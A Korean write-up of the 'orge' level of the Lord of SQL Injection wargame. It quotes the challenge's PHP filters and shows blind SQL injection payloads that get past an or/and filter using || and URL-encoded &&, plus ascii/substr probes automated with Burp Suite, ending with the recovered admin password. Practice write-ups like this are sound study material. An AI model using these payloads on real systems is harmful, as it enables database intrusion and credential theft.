[LOS] ORGE 풀이(7)

7번째 문제인 " orge " 는 전에 풀었던 " orc " 문제와 유사합니다. " pw='{$_GET [pw]} " 안에 쿼리문을 삽입하여 실행되는 형태이지만 몇 가지 다른 점이 존재합니다.

 

검증구문

1. 기존 admin 계정 이외에 guest 계정이 추가적으로 존재함
2. or , and 연산자를 추가적으로 검증하고 있음

 

문제를 해결하기 위한 포인트 부분은

$query = "select pw from prob_orge where id='admin' and pw='{$_GET [pw]}'"; 
if(($result ['pw']) && ($result['pw'] == $_GET ['pw'])) solve("orge"); 

위처럼 'admin' 계정으로 접근할 수 있도록 추가적으로 선언해줘야 하며, 입력된 pw 값과 = DB에 있는 pw 값이 일치해야 해결할 수 있습니다.

 

즉 " orc " 레벨처럼 BSQLI 기법을 활용해서 참, 거짓 값을 통한 패스워드 유추를 해야 합니다.

if(preg_match('/prob|_|\.|\(\)/i', $_GET [pw])) exit("No Hack ~_~"); 
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");

또한 연산자 " or " 와 " and " 는 검증을 하고 있기 때문에 추가적으로 우회 기법을 통해서 열거해보겠습니다.

 

우선 guest 계정이 아닌 "admin" 계정의 패스워드 길이를 유추해야 되기 때문에 " or " 와 " and " 구문을 통해 참 값과 거짓 값을 비교해 봐야 합니다.

 

OR AND 우회

' || id='admin' %26%26 length(pw)>1%23  --> TRUE
' || id='admin' %26%26 length(pw)>8%23  --> FALSE

 

or --> " || "

and --> && --> %26%26 ( GET 방식으로는 "&" 를 이해하지 못하기에 인코딩)

 

pw=' || id='admin' %26%26 ascii(substr(pw,1,1))=47%23

패스워드 길이를 확인했으니 이제 8자리 문자열의 각 자릿수마다 어떤 문자열의 패스워드를 사용하는지 참, 거짓 을 통해 확인해볼 수 있습니다. 

 

" burp suite " 의 Cluster bomb 기능을 사용하여 빨간 박스 쳐진 $1$ 과 $47$ 부분에 값을 하나씩 대입해보며 숫자 형태로 된 패스워드가 존재하는지 확인해볼 겁니다.

32 ~ 47 : 특수문자 (space,!, ", #, $, %, & 등)
58 ~ 64 : 특수문자 (:, ;, <, =, >,?, @)
123 ~ 126 : 특수문자 ({, |, }, ~)
48 ~ 57 : 숫자 (0 ~ 9)
65 ~ 90 : 영어(대문자) (A ~ Z)
97 ~ 122  : 영어(소문자) (a ~ z)

 

" 체크 " 표시된 부분을 보시는 것처럼 8자리 중 1, 3, 4, 5 번째 자리에 숫자가 사용된 것을 확인할 수 있습니다. " payload1 " 영역은 각 자릿수를 의미하며 " payload2 " 는  " 참 " 값으로 도출된 패스워드입니다.

 

payload 설정을 바꿔서 이번에는 " 소문자 " 형태로 설정된 패스워드를 알아보기 위해 ascii 코드 97  ~ 122까지 지정해주고 대입해본 결과 나머지 2, 6, 7, 8 자리의 결과를 모두 나왔습니다.

 

ASCII 코드를 원래 형태로 변환

55 --> 7
98 --> b
55 --> 7
53 --> 5
49 --> 1
97 --> a
101 --> e
99 --> c

 

orc 문제와 진행방법은 동일하지만 출제자의 의도를 파악해보면 " 지정된 계정 " 의 패스워드를 참, 거짓 을 통해 패스워드를 유추하길 원했으며 여기서 주로 사용되는 연산자인 " or와  and "를 검증한다면 어떻게 진행할 것인가?라는 문제로 파악됩니다.